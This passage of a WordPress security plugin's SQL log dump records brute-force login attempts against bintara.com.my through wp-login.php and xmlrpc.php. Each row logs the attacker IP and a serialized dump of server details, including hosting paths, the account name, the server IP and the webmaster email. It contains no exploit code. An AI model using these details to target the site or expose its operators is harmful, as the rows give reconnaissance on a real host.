07:10:55',17739896,19229336,'https://bintara.com.my/wp-login.php',1,0,'80.82.122.216'),(24445,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"80.82.122.216\";s:11:\"REMOTE_PORT\";s:5:\"51420\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCHAh@uZ4OC5N1Fn8FUpgAAAJY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568704258.5532\";s:12:\"REQUEST_TIME\";s:10:\"1568704258\";}}','notice','2019-09-17 07:11:00','2019-09-17 07:10:58',18256472,19556552,'https://bintara.com.my/xmlrpc.php',1,0,'80.82.122.216'),(24446,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"97.74.6.168\";s:11:\"REMOTE_PORT\";s:5:\"38998\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCICh@uZ4OC5N1Fn8FVlQAAAIg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568704522.2169\";s:12:\"REQUEST_TIME\";s:10:\"1568704522\";}}','notice','2019-09-17 07:15:23','2019-09-17 07:15:22',17740912,19231208,'https://bintara.com.my/wp-login.php',1,0,'97.74.6.168'),(24447,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"97.74.6.168\";s:11:\"REMOTE_PORT\";s:5:\"39988\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCIDR@uZ4OC5N1Fn8FVmgAAAI4\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568704525.3273\";s:12:\"REQUEST_TIME\";s:10:\"1568704525\";}}','notice','2019-09-17 07:15:26','2019-09-17 07:15:25',18256872,19556360,'https://bintara.com.my/xmlrpc.php',1,0,'97.74.6.168'),(24448,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"165.227.15.124\";s:11:\"REMOTE_PORT\";s:5:\"21649\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCJ6w99C9j9bhK9KplPYgAAAQE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568705003.1155\";s:12:\"REQUEST_TIME\";s:10:\"1568705003\";}}','notice','2019-09-17 07:23:25','2019-09-17 07:23:23',17739384,19229768,'https://bintara.com.my/wp-login.php',1,0,'165.227.15.124'),(24449,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"165.227.15.124\";s:11:\"REMOTE_PORT\";s:5:\"22641\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCJ7h@uZ4OC5N1Fn8FYSAAAAJQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568705006.8771\";s:12:\"REQUEST_TIME\";s:10:\"1568705006\";}}','notice','2019-09-17 07:23:28','2019-09-17 07:23:27',18256512,19556776,'https://bintara.com.my/xmlrpc.php',1,0,'165.227.15.124'),(24450,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"213.122.172.69\";s:11:\"REMOTE_PORT\";s:5:\"43947\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCKFtK-omY048@iBsM7gAAAAMc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568705046.5585\";s:12:\"REQUEST_TIME\";s:10:\"1568705046\";}}','notice','2019-09-17 07:24:07','2019-09-17 07:24:06',17740176,19230592,'https://bintara.com.my/wp-login.php',1,0,'213.122.172.69'),(24451,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"213.122.172.69\";s:11:\"REMOTE_PORT\";s:5:\"44693\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCKGR@uZ4OC5N1Fn8FYZAAAAJI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568705049.652\";s:12:\"REQUEST_TIME\";s:10:\"1568705049\";}}','notice','2019-09-17 07:24:11','2019-09-17 07:24:10',18256608,19556776,'https://bintara.com.my/xmlrpc.php',1,0,'213.122.172.69'),(24452,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"103.1.239.217\";s:11:\"REMOTE_PORT\";s:5:\"38210\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCL3tK-omY048@iBsM8TQAAAMw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568705503.1066\";s:12:\"REQUEST_TIME\";s:10:\"1568705503\";}}','notice','2019-09-17 07:31:45','2019-09-17 07:31:43',17739312,19230120,'https://bintara.com.my/wp-login.php',1,0,'103.1.239.217'),(24453,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"103.1.239.217\";s:11:\"REMOTE_PORT\";s:5:\"38938\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCL4h@uZ4OC5N1Fn8FbkwAAAIE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568705506.3231\";s:12:\"REQUEST_TIME\";s:10:\"1568705506\";}}','notice','2019-09-17 07:31:47','2019-09-17 